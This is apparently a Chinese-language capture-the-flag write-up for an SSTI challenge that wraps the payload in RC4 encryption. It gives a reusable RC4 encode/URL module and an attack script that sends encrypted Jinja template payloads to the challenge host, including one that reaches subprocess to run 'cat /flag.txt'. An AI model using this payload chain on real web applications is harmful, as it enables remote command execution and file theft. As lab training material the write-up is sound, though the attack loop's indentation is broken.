SSTI 相关，但不是直接注入，外面套了一层 RC4。
先做目录扫描。
RC4 相关脚本（已模块化写好，可以复用）：
from urllib import parse
def s_init(key):
    """Run the RC4 key-scheduling step and return the initial 256-entry S-box.

    The key is consumed character by character through ``ord``; because the
    index is ``key[i % len(key)]`` a key shorter than 256 characters is cycled
    so that every one of the 256 rounds has a key value to mix in.  The result
    is a permutation of 0..255 that ``rc4_encode``/``rc4_decode`` then walk.

    Args:
        key: Non-empty ``str``.  An empty key raises ``ZeroDivisionError``
            from the ``% len(key)`` index arithmetic.

    Returns:
        ``list[int]`` holding the shuffled S-box.
    """
    sbox = list(range(256))
    key_len = len(key)
    swap_idx = 0
    for pos in range(256):
        # Fold the next (cycled) key code point into the running index, then swap.
        swap_idx = (swap_idx + sbox[pos] + ord(key[pos % key_len])) % 256
        sbox[pos], sbox[swap_idx] = sbox[swap_idx], sbox[pos]
    return sbox
def rc4_encode(plain_text, key):
    """Encrypt ``plain_text`` with RC4 under ``key`` and return the XORed text.

    This works on Unicode code points rather than bytes: each character ``ch``
    becomes ``chr(ord(ch) ^ k)`` with ``k`` the next keystream value (0..255)
    from the PRGA.  A character above U+00FF therefore stays above 255 after
    the XOR, so the output is a ``str`` that may contain non-Latin-1 code
    points; how that is serialised is left to the caller (see
    ``rc4_encode_url``).  On this page RC4 is an obfuscation layer around the
    payload, not a confidentiality mechanism — RC4 is a deprecated cipher.

    Args:
        plain_text: ``str`` (or any iterable of one-character strings).
        key: Non-empty ``str`` passed to ``s_init``.

    Returns:
        ``str`` of the same length as ``plain_text``.
    """
    sbox = s_init(key)

    def keystream():
        # RC4 PRGA: one swap per emitted value; state lives in sbox, i, j.
        i = j = 0
        while True:
            i = (i + 1) % 256
            j = (j + sbox[i]) % 256
            sbox[i], sbox[j] = sbox[j], sbox[i]
            yield sbox[(sbox[i] + sbox[j]) % 256]

    # zip stops when plain_text is exhausted, so the generator is infinite-safe.
    return ''.join(chr(ord(ch) ^ k) for ch, k in zip(plain_text, keystream()))
def rc4_decode(cipher_text, key):
    """Decrypt ``cipher_text`` produced by ``rc4_encode`` under the same ``key``.

    RC4 is a stream cipher whose keystream is XORed onto the input, so
    decryption is the identical operation as encryption; this function is
    the same computation as ``rc4_encode`` (the original bodies are
    line-for-line identical) and simply delegates to it so the PRGA exists
    in one place.

    Args:
        cipher_text: ``str`` as returned by ``rc4_encode``.
        key: Non-empty ``str`` used for encryption.

    Returns:
        The recovered plaintext ``str``.
    """
    return rc4_encode(cipher_text, key)
def rc4_encode_url(plain_text, key):
    """RC4-encrypt ``plain_text`` and percent-encode the result for a URL.

    ``parse.quote`` is called with its defaults, so the RC4 output ``str`` is
    first encoded as UTF-8 and then percent-encoded, with ``/`` left unescaped.
    The caller on this page appends the result straight onto a query string,
    so the receiving side must reverse both the percent-encoding and the
    UTF-8 interpretation; confirm that matches the server's decoder.

    Args:
        plain_text: ``str`` to encrypt.
        key: Non-empty ``str`` RC4 key.

    Returns:
        Percent-encoded ``str`` safe to place in a URL.
    """
    cipher_text = rc4_encode(plain_text, key)
    return parse.quote(cipher_text)
if __name__ == '__main__':
    # Demo entry point: read one plaintext line from stdin and print its
    # RC4 + URL-encoded form under the fixed key below.
    # keys = str(input("Enter the key: "))
    keys = 'HereIsTreasure'  # hard-coded demo key; the commented prompt above reads it interactively
    plain = input("Enter the plain text: ")
    encoded = rc4_encode_url(plain, keys)
    print(f"The encoded text is: {encoded}")
攻击脚本:
import requests
from rc4 import rc4_encode_url
url = 'http://node4.anna.nssctf.cn:28142/secret?secret='
while 1:
key = 'HereIsTreasure'
payload = input("Payload:")
# payload = "{{''.__class__.__mro__[2].__subclasses__()[239]('cat /flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}"
encoded_payload = rc4_encode_url(payload, key)
response = requests.get(url + encoded_payload)
print(encoded_payload + '\n')
print(response.text)